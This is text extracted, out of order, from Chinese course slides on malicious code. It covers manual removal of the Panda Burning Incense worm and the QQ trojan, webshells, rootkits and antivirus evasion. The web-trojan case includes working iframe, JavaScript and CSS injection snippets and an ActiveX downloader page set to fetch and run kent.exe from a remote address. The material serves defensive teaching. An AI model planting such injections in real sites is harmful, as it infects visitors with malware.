恶意代码

案例1- 熊猫烧香病毒
重启以后我们要仔细的检查下是否有有感染和隐藏的文件 我们进入cmd 在任意盘符下面输入：dir /ah
案例1- 熊猫烧香病毒
会发现还有隐藏的 病毒文件，那么我就要去手工清除这些隐藏的病毒 进程文件。 我们在cmd 下运行：

attrib -r -h -s autorun.inf attrib -r -h -s setup.exe
我们也可以理解为潜伏在你的系统中一个包含很多程序功能，比如: 清 楚日志，添加用户等等后门程序。 当然，rootkit还有一些隐藏的进程，文件端口等等，开发者是利用一 些办法不被发现。
恶意代码的概述
恶意代码的辨别 现在最常见恶意文件类型有：exe、dll、inf、cur、vbs、bat。大部分 exe是主文件程序，部分软件需要用exe程序调用才能运行。 如何辨别恶意文件



文件名无规则异常的 字母数字纯组合的
如：svchost 同名字却在其他系统位置
课程目录
恶意代码概述 恶意代码案例 恶意代码防御
恶意代码案例
案例1-熊猫烧香病毒分析 案例2-QQ巨盗木马分析 案例3-网马的解析和免杀 案例4-Webshell讲解
案例5-Rootkit 后门与查杀
案例1- 熊猫烧香病毒
案例3- 网马原理和免杀解析
挂马技术

挂马就是黑客利用各种手段获得网站权限后，通过网页后门修改 网站页面的内容，向页面中加入恶意转向代码，当我们访问被加 入多恶意代码多页面时候，就会自动的访问被转向的地址或者下 载木马病毒恶意程序等等。
案例3- 网马原理和免杀解析
Iframe挂马法：

<iframe src=http: //www.baidu.com/muma.html width=0 height=0></iframe>
案例2-QQ 巨盗木马分析
在Autoruns —Image Hijacks下载删除所有的镜像劫持文件
案例2-QQ 巨盗木马分析
最后我们要检查各个盘符下的隐藏病毒文件，删除后重启系统。

OSO.exe Autorun.inf
案例3- 网马原理和免杀解析
定义

相信很多人之前只知道网马，但是不知道网马是怎么形成的。 知道网马是通过IE 漏洞，但是不知道怎么做的。 虽然现在网马可利用的漏洞少了，但是还是有个别很多电脑防护 不安全下，使得用户有机会可成变成别人的肉鸡。

黑客在入侵网站后，为了下次能再次进入到网站的服务器或者有 利权限时候就会留下一个网页的后门。这个网页程序的后门。会 执行多种功能。比如：目录查看，端口扫描，下载，执行等等一 系列操作。且隐蔽性很深。不易察觉症状。
恶意代码概述
Rootkit后门和查杀 Rootkit 历史已经很悠久了，存在于windows，linux 中。 root 英文的意思就是扎根。Kit就是包的意思。

症状
发现电脑缓慢。文件异常，用杀毒检测出200以上同类型的文件。 可判定为蠕虫病毒。 安全软件英文提示为：Worm。 特征 感染（破坏）系统文件。

恶意代码概述
木马的原理和解析 定义

木马是现在大多用户最常见到一种恶意程序，和病毒程序相比 没有感染性（特殊木马除外）主要是破坏，监听，盗取用户的
在排查中，我们发现一个可疑进程：Spoclsv.exe 通过后面的参数，我们更确定的是否是病毒文件。
案例1- 熊猫烧香病毒
查找进程可疑程序
案例1- 熊猫烧香病毒
确定病毒后，我们想要结束这个进程。 在cmd下 taskkill /f /im PID 来结束进程
案例1- 熊猫烧香病毒
查启动项 -> 删除病毒启动项。 在开始-运行-msconfig-启动项中我们可以看到恶意病毒的位置和注册 表的信息
案例1- 熊猫烧香病毒
然后我们要记下病毒的位置-C:\windows\system32\drivers\spoclsv.exe HKCU\SOFTWAER\Microsoft\windows\Current\Verstion\RUN 这个病毒的启动项信息，这个病毒的名称是svchare 。
案例1- 熊猫烧香病毒
病毒名称: 武汉男生，又名熊猫烧香病毒。”Worm.WhBoy.h “ 样本说明 大小：59KB 变异版 MD5: 87551e33d517442424e586d25a9f8522 SHA-1:cbbab396803685d5de593259c9b2fe4b0d967bc7
案例1- 熊猫烧香病毒
案例3- 网马原理和免杀解析
网马需要用到的工具和防范

网马生成器 远程控制软件 防范于做过免杀的木马
案例3- 网马原理和免杀解析
网马生成器
案例3- 网马原理和免杀解析
网马生成器
<html></script></body><BODY><OBJECT ID="DownloaderActiveX1" WIDTH="0" HEIGHT="0" CLASSID="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" CODEBASE="DownloaderActiveX.cab#Version=1,0,0,1"><PARAM NAME="propProgressbackground" VALUE="#bccee8"><PARAM NAME="propTextbackground" VALUE="#f7f8fc"><PARAM NAME="propBarColor" VALUE="#df0203"><PARAM NAME="propTextColor" VALUE="#000000"><PARAM NAME="propWidth" VALUE="0"><PARAM NAME="propHeight" VALUE="0"><PARAM NAME="propDownloadUrl" VALUE="http://192.168.0.8:8080/kent.exe"><PARAM NAME="propPostdownloadAction" VALUE="run"><PARAM NAME="propInstallCompleteUrl" VALUE=""><PARAM NAME="propbrowserRedirectUrl" VALUE=""><PARAM NAME="propVerbose" VALUE="0"><PARAM NAME="propInterrupt" VALUE="0"></OBJECT></script></body></html>
案例3- 网马原理和免杀解析
Fra Baidu bibliotekJS 挂马法：

document.write("<iframe width='0' height='0' src='http //www.xxx/muma.htm'></iframe>"); 保存为xxx.js， 则JS 挂马代码为 <script language=javascript src=xxx.js></script>
我们要去进入C:\windows\system32\drivers\ 目录将主文件 spoclsv.exe 删除。


Cmd命令下进入 c:\windows\system32\drivers下面输入 dir spoclsv.exe 会显示以下信息，我们用del /f spoclsv.exe 将它彻底删除。
案例2-QQ 巨盗木马分析
在注册表里找到HKEY_LOCAL_MACHINF\SOFTWAE\Microsoft\windows NT\CurrentVersion\Image File Execution Options\ 会发现很多被镜像劫持的系统组建。
案例2-QQ 巨盗木马分析
借助第三方Autoruns 工具配置删除
案例3- 网马原理和免杀解析
远程控制软件
用于把小马集合在网马中生成html挂马使用
案例3- 网马原理和免杀解析
木马的免杀？ 特征码免杀 无特征免杀 源码免杀
案例3- 网马原理和免杀解析
无特征码免杀
案例3- 网马原理和免杀解析
源码免杀
案例4-Webshell 讲解
Webshell 准确来说是对系统没有危害的，但是它为什么又这么恶心和 又感觉可怕呢。
恶意代码
课程简介
本课程主要讲解了恶意代码几种类型的原理模式 恶意代码的原理和查杀，以及对系统的影响危害。 通过几个案例可以手工判断和查杀恶意代码。 恶意代码的常见状况与防御。
课程目录
恶意代码概述 恶意代码案例 恶意代码防御
恶意代码概述
病毒的危害解析 定义 计算机病毒是一个具有破坏性，感染性的一种恶意程序。 功能 中毒后会对计算机大量的同类型文件进行破坏，感染 常见的病毒有：熊猫，小浩，维金蠕虫病毒等。
案例2-QQ 巨盗木马分析
进程守护的分析
不管是在任务管理器中还是cmd都是无法删除，那么我们就要用到第 三方软件的支持。 工具打不开怎么办?我们改下其他的名字
案例2-QQ 巨盗木马分析
冰刃-文件-创建进程-添加规则
案例2-QQ 巨盗木马分析
然后选择禁止-写入文件名
案例2-QQ 巨盗木马分析
把木马文件名都添加进去
如何分辨和防护挂马：


如果发现打开网站很卡，加载程序，要检查下源码顶部或者底部 在源码里搜索iframe，大多数网马都是这个框架写的，个别除外。 一般来说，被植入恶意病毒有3种原因：网站代码、恶意入侵、病 毒导致。及时查找和保证网站程序更新漏洞补丁。 经常检查网站目录有没有未知文件，注意文件后面的更改日期。 安装杀毒防护软件，和ARP防火墙，有时候局域网ARP攻击，这样 会导致全部服务器被挂马。
Web= 网页，网站。Shell=后门，网站后门。 我们渗透到时候会通过各种手段拿到webshell 也就是成功一半了。


网马就是通过利用IE游览器0day 来将木马和html进行结合。如用 户去访问这个html地址，就会在后台自动下载，安装，运行等等 网马最常见的为html网马，JPG网马等等。
特征 控制和恶意盗取信息。
恶意代码概述
Webshell讲解 定义 Web 就是网站服务，shell就是权限。Webshell就是一种恶意的后门 程序。 功能
案例3- 网马原理和免杀解析
CSS 挂马法：

body { background-image: url('javascript:document.write("<script src=http: //www.baidu/muma.js></script>")')}
案例3- 网马原理和免杀解析
本案以曾经很流行的知名度病毒 熊猫烧香为案列 为大家详细讲解病 毒的行为 以及手工是查杀方案。
案例1- 熊猫烧香病毒
运行样本后的特征

任务管理器打不开，无法加载任务管理器，
案例1- 熊猫烧香病毒
查系统内存-排查可疑进程 在cmd下输入命令tasklist /svc 来查看进程
案例1- 熊猫烧香病毒
案例1- 熊猫烧香病毒
去除后我们用 del /f 来进行删除掉
案例2-QQ 巨盗木马分析
QQ巨盗木马分析

大小：94KB 很经典的一款盗取QQ的木马。
案例2-QQ 巨盗木马分析
运行样本后，3 款反Rootkit软件中的，冰刃打不开
案例2-QQ 巨盗木马分析
查看进程，发现有3 个可疑进程。 我们在任务管理器结束掉，在结束掉任意一个的时候会发现。
案例2-QQ 巨盗木马分析
我们在cmd 下打开注册表或者其他程序的时候，会发现进程里木马又 自动复活。 这个就是木马的镜像劫持。
案例2-QQ 巨盗木马分析
镜像劫持的分析
案例2-QQ 巨盗木马分析
cmd 下找到注册表的位置，修改其他任意名字。 可以用 Copy regedit.exe xx.exe
各种私人信息。比如：计算机内文件，网络帐号，更甚至为银行 卡信息中毒后会对计算机大量的同类型文件进行破坏，感染。 症状

黑客现在一般可以通过汇编软件对木马进行反编译，来躲过杀毒 软件的扫描，能使正常的运行。在安全报告中代码为：Trojan。
特征 破坏和盗取私人信息。
恶意代码概述
网马解析和免杀原理 定义 网马也是现在最常见的一种web 型的恶意程序。具有隐蔽性功能能 使正常的运行。 症状